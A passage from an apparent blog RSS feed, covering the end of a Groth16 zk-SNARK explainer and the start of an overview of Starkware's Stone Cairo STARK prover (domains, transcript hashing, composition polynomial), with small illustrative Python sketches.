&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    7. $[B_0 (t) ]_1, [B_1 (t) ]_1 , ... , [B_n (t) ]_1$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    8. $[B_0 (t) ]_2, [B_1 (t) ]_2 , ... , [B_n (t) ]_2$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    9. $[K_{ k + 1 }^p (t)] , [ K_{ k + 2 }^p (t)] , ... , [K_n^p (t)]$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    10. $[Z_0 (t)] , [Z_1 (t)] , ... , [ Z_{ m - 1 } (t)]$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The verifying key is much shorter and also contains the value of one pairing, since that value is constant:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. $[\alpha]_1 \dagger [\beta]_2$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. $[\gamma]_2$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. $[\delta]_2$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. $[K_0^v (t)]_1 , [K_1^v (t)]_1 , ... , [K_k^v (t)]_1$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;proof-generation&quot;&gt;Proof generation&lt;&#x2F;h2&gt;
&lt;p&gt;The prover receives the proving key and knows the polynomials representing the program and the public input, and he wants to prove that he has a witness satisfying that program. First, the prover needs to calculate the quotient polynomial $h(x)$ or, more precisely, its coefficients. The prover has to calculate&lt;br &#x2F;&gt;
$$h(x) = \frac{\sum A_k(x) z_k \sum B_k (x) z_k - \sum C_k (x) z_k}{Z_D (X) }$$&lt;&#x2F;p&gt;
&lt;p&gt;The best way to evaluate this quotient is by choosing a domain $D_{ev}$, of size at least the degree of the quotient polynomial plus one and not containing elements from $D_0$ (the interpolation domain) and evaluating numerator and denominator at all the elements of $D_{ev}$. Since we have at least as many evaluations of the polynomial $h (x)$ as its degree plus one, we can reconstruct $h(x)$ via interpolation. In practice, the fastest way to do this is by using the Fast Fourier Transform for evaluation and interpolation. The prover now possesses a vector of coefficients $h_0 , h_1 , h_2 , … , h_{ m - 1 }$.&lt;&#x2F;p&gt;
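The evaluate-then-interpolate strategy can be sketched with a toy numerator standing in for $P(x)$. Everything below (field size, domains, helper names) is an illustrative assumption, and plain Lagrange interpolation is used instead of FFTs:

```python
# Sketch of the quotient computation by evaluation on a disjoint domain,
# over a small prime field.
MOD = 101  # toy field modulus

def lagrange_interp(xs, ys):
    """Coefficients (low-to-high) of the polynomial through the given points."""
    n = len(xs)
    coeffs = [0] * n
    for j in range(n):
        # Build basis_j(x) = prod_{k != j} (x - x_k), then scale it.
        basis, denom = [1], 1
        for k in range(n):
            if k == j:
                continue
            basis = [0] + basis                      # multiply by x
            for i in range(len(basis) - 1):
                basis[i] = (basis[i] - xs[k] * basis[i + 1]) % MOD
            denom = denom * (xs[j] - xs[k]) % MOD
        scale = ys[j] * pow(denom, MOD - 2, MOD) % MOD  # divide by denom
        for i, b in enumerate(basis):
            coeffs[i] = (coeffs[i] + scale * b) % MOD
    return coeffs

def numerator(x):   # toy numerator vanishing on D_0 = {1, 2, 3}
    return (x - 1) * (x - 2) * (x - 3) * (x + 5) % MOD

def Z_D(x):         # vanishing polynomial of D_0
    return (x - 1) * (x - 2) * (x - 3) % MOD

D_ev = [10, 11]     # disjoint evaluation domain, size deg(h) + 1
h_vals = [numerator(x) * pow(Z_D(x), MOD - 2, MOD) % MOD for x in D_ev]
h = lagrange_interp(D_ev, h_vals)
assert h == [5, 1]  # h(x) = 5 + x, recovered by interpolation
```

Because $D_{ev}$ is disjoint from $D_0$, the vanishing polynomial never evaluates to zero and the pointwise division is well defined.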
&lt;p&gt;To ensure that the proof is zero-knowledge, the prover samples two random scalars, $r$ and $s$.&lt;&#x2F;p&gt;
&lt;p&gt;The prover can compute the three elements of the proof, $\pi = ([\pi_1 ]_1 , [\pi_2 ]_2 , [\pi_3 ]_1)$ by doing the following calculations,&lt;br &#x2F;&gt;
$[\pi_1 ]_1 = [\alpha]_1 + \sum z_k [A_k (t) ]_1 + r [\delta]_1$&lt;br &#x2F;&gt;
$[\pi_2 ]_2 = [\beta]_2 + \sum z_k [B_k (t) ]_2 + s[\delta]_2$&lt;br &#x2F;&gt;
$[\pi_2 ]_1 = [\beta]_1 + \sum z_k [B_k (t) ]_1 + s[\delta]_1$&lt;br &#x2F;&gt;
$[h(t) Z_D (t) \delta^{ - 1 } ]_1 = \sum h_i [Z_i (t)]_1$&lt;br &#x2F;&gt;
$[\pi_3 ]_1 = \sum w_i [K_i^p ]_1 + [h(t) Z_D (t) \delta^{ - 1 } ]_1 + s[\pi_1 ]_1 + r [\pi_2 ]_1 - rs [\delta]_1$&lt;&#x2F;p&gt;
&lt;h2 id=&quot;verification&quot;&gt;Verification&lt;&#x2F;h2&gt;
&lt;p&gt;The verifier has the verifying key, the public input and parses the proof as $[\pi_1 ]_1, [\pi_2 ]_2, [\pi_3 ]_1$ and computes the following:&lt;br &#x2F;&gt;
$[\pi_1 ]_1 \dagger [\pi_2 ]_2 = P_1$&lt;br &#x2F;&gt;
$[\pi_3 ]_1 \dagger [\delta]_2 + [\alpha]_1 \dagger [\beta]_2 + \left(\sum x_i [K_i^v ]_1 \right) \dagger [\gamma]_2 = P_2$&lt;&#x2F;p&gt;
&lt;p&gt;The proof is valid if $P_1$ and $P_2$ coincide. This is equivalent to checking the modified QAP.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
&lt;p&gt;In this post, we covered the Groth16 protocol, which provides a framework to prove the correctness of a computation without revealing sensitive information. It has concise proofs and an elegant verification but requires a trusted setup for every program we want to prove. We saw the steps to transform the program into arithmetic circuits or their equivalent R1CS, which can then be compiled into a quadratic arithmetic program. We explained how the protocol transforms the basic equations to ensure that the prover cannot cheat and the verifier does not learn anything about the private data. In an upcoming post, we will cover how to code Groth16 from scratch.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>An overview of the Stone Cairo STARK Prover</title>
          <pubDate>Thu, 28 Sep 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/overview-of-the-stone-prover/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/overview-of-the-stone-prover/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/overview-of-the-stone-prover/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;About one month ago, Starkware open-sourced its Stone Prover, which is currently in production in Starknet. It is a library that allows one to produce proofs of computational integrity using STARKs (Scalable Transparent Arguments of Knowledge).&lt;&#x2F;p&gt;
&lt;p&gt;The codebase has around 100k lines of code, written mainly in C++. It has the following main components:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * AIR: contains the constraints of the algebraic intermediate representation of CAIRO.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Channel (transcript in STARK Platinum): contains the interactions between the prover and verifier and gives methods to sample random challenges.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Composition polynomial: the constraints of the AIR are enforced over the trace polynomials and randomly combined into a single polynomial.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Commitment schemes: contains the methods to (cryptographically) commit to a series of polynomial evaluations.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * FRI (Fast Reed-Solomon Interactive Oracle Proofs of Proximity): performs the low-degree testing that allows one to prove that a function is close to a low-degree polynomial.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;At LambdaClass, we are working on making our Cairo prover, STARK Platinum (written in Rust), compatible with the Stone Prover, so that anyone can use the Rust version to generate valid proofs for applications built on top of Starknet. We hope that the performance and usability of our prover help the community adopt it.&lt;&#x2F;p&gt;
&lt;p&gt;In this post, we will analyze some of the components of the Stone Prover and explain how they work and how they are implemented. For an introduction to STARKs, see our &lt;a href=&quot;&#x2F;diving-deep-fri&#x2F;&quot;&gt;previous posts&lt;&#x2F;a&gt; or the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;tree&#x2F;main&#x2F;docs&#x2F;src&#x2F;starks&quot;&gt;STARK Platinum docs&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;domains&quot;&gt;Domains&lt;&#x2F;h2&gt;
&lt;p&gt;Every implemented field $\mathbb{F}$ has a generator $\omega$ of the unit group $\mathbb{F}^\times$. It can be obtained by calling the class method &lt;code&gt;Generator&lt;&#x2F;code&gt; of &lt;code&gt;PrimeFieldElement&lt;&#x2F;code&gt;. The generator for the &lt;code&gt;Stark252Field&lt;&#x2F;code&gt; is $\omega = 3$ (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;algebra&#x2F;fields&#x2F;prime_field_element.h#L138-L140&quot;&gt;here&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;algebra&#x2F;fields&#x2F;big_prime_constants.h#L61&quot;&gt;here&lt;&#x2F;a&gt;).&lt;&#x2F;p&gt;
&lt;p&gt;The class representing a domain is &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;algebra&#x2F;domains&#x2F;list_of_cosets.h#L34&quot;&gt;&lt;code&gt;ListOfCosets&lt;&#x2F;code&gt;&lt;&#x2F;a&gt;. The method &lt;code&gt;TraceGenerator&lt;&#x2F;code&gt; returns a primitive root of unity $g$ whose order is the trace length $2^n$ and which generates a domain $D$. It is computed as $g = \omega^{ ( p - 1 ) &#x2F; 2^n }$. The LDE is then represented as a list of cosets $\{ h^i w D : i = 0, \dots, k - 1 \}$, all of the same size as $D$, such that their union is the actual LDE domain:&lt;&#x2F;p&gt;
&lt;p&gt;$$D_{\text{LDE}} = w D \cup h w D \cup h^2 w D \cup \cdots \cup h^{k-1} w D,$$&lt;br &#x2F;&gt;
where $h = \omega^{( p - 1 ) &#x2F; 2^{ n + k }}$.&lt;&#x2F;p&gt;
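To make the domain construction concrete, here is a toy sketch in Python over the small field $\mathbb{F}_{17}$ instead of the Stark252 field (the field choice and the parameters $n = 2$, $k = 1$ are illustrative assumptions): it computes the trace generator $g$, the coset step $h$, and checks that the union of the cosets covers the LDE domain.

```python
# Toy reconstruction of the domain setup, using the small prime field F_17
# instead of the Stark252 field (an assumption for brevity).
p = 17
omega = 3            # generator of the unit group F_17^x (order p - 1 = 16)
n, k = 2, 1          # trace length 2^n = 4, blowup 2^k = 2 (two cosets)

g = pow(omega, (p - 1) // 2**n, p)        # trace generator, order 2^n
h = pow(omega, (p - 1) // 2**(n + k), p)  # coset step, order 2^(n+k)
w = omega                                 # coset offset

D = [pow(g, i, p) for i in range(2**n)]   # trace domain generated by g
cosets = [{(w * pow(h, j, p) * d) % p for d in D} for j in range(2**k)]

# The union of the cosets is the full LDE domain w * <h>:
lde = {(w * pow(h, i, p)) % p for i in range(2**(n + k))}
assert set().union(*cosets) == lde
```

With the Stark252 field, the same computation applies with $p = 2^{251} + 17 \cdot 2^{192} + 1$ and $\omega = 3$, only the exponents are much larger.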
&lt;h2 id=&quot;transcript&quot;&gt;Transcript&lt;&#x2F;h2&gt;
&lt;p&gt;The Stone Prover uses a &lt;code&gt;NonInteractiveProverChannel&lt;&#x2F;code&gt; class to handle its interactions with the transcript. There are two basic operations:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `SendBytes`: the prover appends bytes to the transcript.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `ReceiveBytes`: the prover receives bytes from the transcript.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;These operations are building blocks for more complex operations, such as sampling a &lt;code&gt;FieldElement&lt;&#x2F;code&gt; or a number. Several hash functions can be used to interact with the transcript (e.g., Keccak, Pedersen).&lt;&#x2F;p&gt;
&lt;p&gt;These operations are mainly implemented in the &lt;code&gt;HashChain&lt;&#x2F;code&gt; class, with other classes just delegating to it. It has the following attributes:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `self.counter`: counts how many blocks of $K$ bytes have been consumed.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `self.hash`: holds the current state of the hash function.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `self.spare_bytes`: when a user asks for $T$ bytes where $T$ is not a multiple of $K$, the leftover bytes are stored here for later use.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Here, $K$ is the number of bytes needed to store the output of the chosen hash function (e.g., 32 bytes for Keccak256).&lt;&#x2F;p&gt;
&lt;h3 id=&quot;appending-to-the-transcript&quot;&gt;Appending to the transcript&lt;&#x2F;h3&gt;
&lt;p&gt;When bytes $X$ are appended to the transcript, the current digest $D$ is obtained and interpreted as a BigInt. Then, a seed increment is added to it. The concatenation of this new seed and $X$ becomes the new state of the hash function.&lt;&#x2F;p&gt;
&lt;p&gt;Pseudocode:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;def append(new_bytes, seed_increment):&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    digest = self.hash.digest()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    new_seed = digest + seed_increment&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    self.hash = Hash(new_seed || new_bytes)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Here, &lt;code&gt;||&lt;&#x2F;code&gt; is the concatenation operator.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;sampling-from-the-transcript&quot;&gt;Sampling from the transcript&lt;&#x2F;h3&gt;
&lt;p&gt;Pseudocode:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;def sample_block():&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    counter_bytes = | 24 bytes of 0x00 | counter as u64 | # This depends on the &amp;quot;block&amp;quot; size, the hash size.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    self.counter++&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    return Hash(self.hash.digest() || counter_bytes).digest()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;def sample(number_of_bytes):&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    result = empty byte string&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for each 32-byte block needed to cover number_of_bytes:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        result = result || sample_block()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    return result&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This is a simplified version of the code. Here, the hash size is assumed to be 32 bytes (256 bits). Also, this pseudocode does not handle the case where a programmer asks for a number of bytes that’s not a multiple of the hash size.&lt;&#x2F;p&gt;
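The two pseudocode fragments above can be combined into a runnable sketch. This uses SHA3-256 from Python's standard library as a stand-in for the configurable hash (Stone's Keccak256 uses different padding than SHA3-256, so this is illustrative, not byte-compatible), and the class name and seed handling are assumptions for the example:

```python
import hashlib

K = 32  # digest size in bytes for a 256-bit hash

class HashChain:
    """Toy transcript hash chain; SHA3-256 stands in for Keccak256."""

    def __init__(self, seed: bytes):
        self.state = hashlib.sha3_256(seed).digest()
        self.counter = 0  # blocks of K bytes consumed so far

    def append(self, new_bytes: bytes, seed_increment: int = 1) -> None:
        # Interpret the digest as a big integer, add the seed increment,
        # and absorb the appended bytes into a fresh hash state.
        new_seed = (int.from_bytes(self.state, "big") + seed_increment) % 2**(8 * K)
        self.state = hashlib.sha3_256(new_seed.to_bytes(K, "big") + new_bytes).digest()

    def sample_block(self) -> bytes:
        # | 24 bytes of 0x00 | counter as u64 |, for counter < 2**64.
        counter_bytes = self.counter.to_bytes(K, "big")
        self.counter += 1
        return hashlib.sha3_256(self.state + counter_bytes).digest()

    def sample(self, n_bytes: int) -> bytes:
        out = b""
        while len(out) < n_bytes:
            out += self.sample_block()
        return out[:n_bytes]

chain = HashChain(b"public inputs")
chain.append(b"trace commitment root")
challenge = chain.sample(32)  # deterministic given the same transcript
```

Both prover and verifier run the same sequence of append and sample operations, so they derive identical challenges without any interaction.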
&lt;h3 id=&quot;transcript-initialization-strong-fiat-shamir&quot;&gt;Transcript initialization (Strong Fiat-Shamir)&lt;&#x2F;h3&gt;
&lt;p&gt;The main prover and verifier executables initialize the transcript using a strong Fiat-Shamir strategy. This means that the hash state is seeded with the public parameters of the statement being proven.&lt;&#x2F;p&gt;
&lt;p&gt;There are two implementations of this: the Fibonacci AIR and the Cairo AIR (&lt;code&gt;CpuAir&lt;&#x2F;code&gt;).&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * [Fibonacci](https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;statement&#x2F;fibonacci&#x2F;fibonacci_statement.inl#L40-L52): the transcript is initialized with `claimed_index_in_64_bit_big_endian || claimed_value_in_montgomery_form`&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * [Cairo](https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;statement&#x2F;cpu&#x2F;cpu_air_statement.cc#L99): the transcript is initialized with the `n_steps`, `rc_min`, `rc_max`, and the public memory. The layout is described [here](https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;statement&#x2F;cpu&#x2F;cpu_air_statement.cc#L127-L135).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;logging-interactions&quot;&gt;Logging interactions&lt;&#x2F;h3&gt;
&lt;p&gt;The flag &lt;code&gt;-generate_annotations&lt;&#x2F;code&gt; can be enabled when the main prover is executed. This logs the interactions between the prover and the verifier and can help debug and address compatibility issues. The annotations are added to the output JSON file of the proof.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;r15g0-BAn.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;hash-functions&quot;&gt;Hash functions&lt;&#x2F;h3&gt;
&lt;p&gt;By default, the &lt;code&gt;keccak256&lt;&#x2F;code&gt; hash function is used.&lt;&#x2F;p&gt;
&lt;p&gt;This is the list of supported options:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;using HashTypes = InvokedTypes&amp;lt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Blake2s256, Keccak256, Pedersen, MaskedHash&amp;lt;Keccak256, 20, true&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    MaskedHash&amp;lt;Blake2s256, 20, true&amp;gt;, MaskedHash&amp;lt;Blake2s256, 20, false&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    MaskedHash&amp;lt;Keccak256, 20, false&amp;gt;&amp;gt;;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;composition-polynomial&quot;&gt;Composition polynomial&lt;&#x2F;h2&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;gist.github.com&#x2F;schouhy&#x2F;64fd2fca56e6776d16eb8df3437a0816&quot;&gt;Here&lt;&#x2F;a&gt; is an example of how to instantiate a composition polynomial and compute evaluations of it. It can be run like the Fibonacci example.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;relevant-classes&quot;&gt;Relevant classes&lt;&#x2F;h3&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * [`CompositionPolynomial`](https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;composition_polynomial&#x2F;composition_polynomial.h#L55): Abstract class defining interface. It has only two child classes &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      * [`CompositionPolynomialImpl`](https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;composition_polynomial&#x2F;composition_polynomial.h#L81): Concrete implementation of the above. It does NOT follow the pimpl pattern. It&amp;#39;s just a child class.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      * `CompositionPolynomialMock`: Used for testing.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * [`CompositionOracleProver`](https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;stark&#x2F;composition_oracle.h#L44): A wrapper around a `CompositionPolynomial` that also knows the polynomial interpolating the trace (called `traces`), the domains of interpolation, and the transcript.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;notes&quot;&gt;Notes&lt;&#x2F;h3&gt;
&lt;p&gt;Despite the name, the class &lt;code&gt;CompositionPolynomialImpl&lt;&#x2F;code&gt; is not responsible for the actual computation of the composition polynomial. It does not handle the logic of collecting all individual evaluations of the constraints and gluing them together to form the composition poly. It handles parallelization and formats all inputs to pass them to &lt;code&gt;Air::ConstraintsEval&lt;&#x2F;code&gt;. This is the method where constraints are both evaluated &lt;strong&gt;and&lt;&#x2F;strong&gt; aggregated to obtain the evaluation of the composition polynomial. So, every implementation of &lt;code&gt;Air&lt;&#x2F;code&gt; is responsible for the correct aggregation step of all the constraint evaluations.&lt;&#x2F;p&gt;
&lt;p&gt;Two things stand out:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * There is no degree adjustment. This is seen in the [Fibonacci Air](https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;air&#x2F;fibonacci&#x2F;fibonacci_air0.inl#L83-L164) and the [Cairo Air](https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;air&#x2F;cpu&#x2F;board&#x2F;cpu_air_definition0.inl#L302-L309).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The coefficients used to aggregate all terms [are all powers of a single challenge](https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;stark&#x2F;stark.cc#L44-L58).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;evaluation&quot;&gt;Evaluation&lt;&#x2F;h3&gt;
&lt;p&gt;For computing the composition polynomial evaluations, the prover calls &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;stark&#x2F;stark.cc#L327C49-L327C49&quot;&gt;&lt;code&gt;CompositionOracleProver::EvalComposition(n_tasks)&lt;&#x2F;code&gt;&lt;&#x2F;a&gt;. This will return the set of evaluations of the composition polynomial in the $d$ cosets, where $d$ is chosen as the minimum integer such that the degree bound of the composition polynomial is less than $2^n d$ (see the Domains section for details about domains and cosets). The oracle then uses its pointers to the trace polynomials to evaluate them at the LDE domain (or uses cached computations from the previous commitment phase). It then passes this to &lt;code&gt;CompositionPolynomial::EvalOnCosetBitReversedOutput()&lt;&#x2F;code&gt; along with coset offsets and other domain-relevant data. This method launches multiple tasks that call 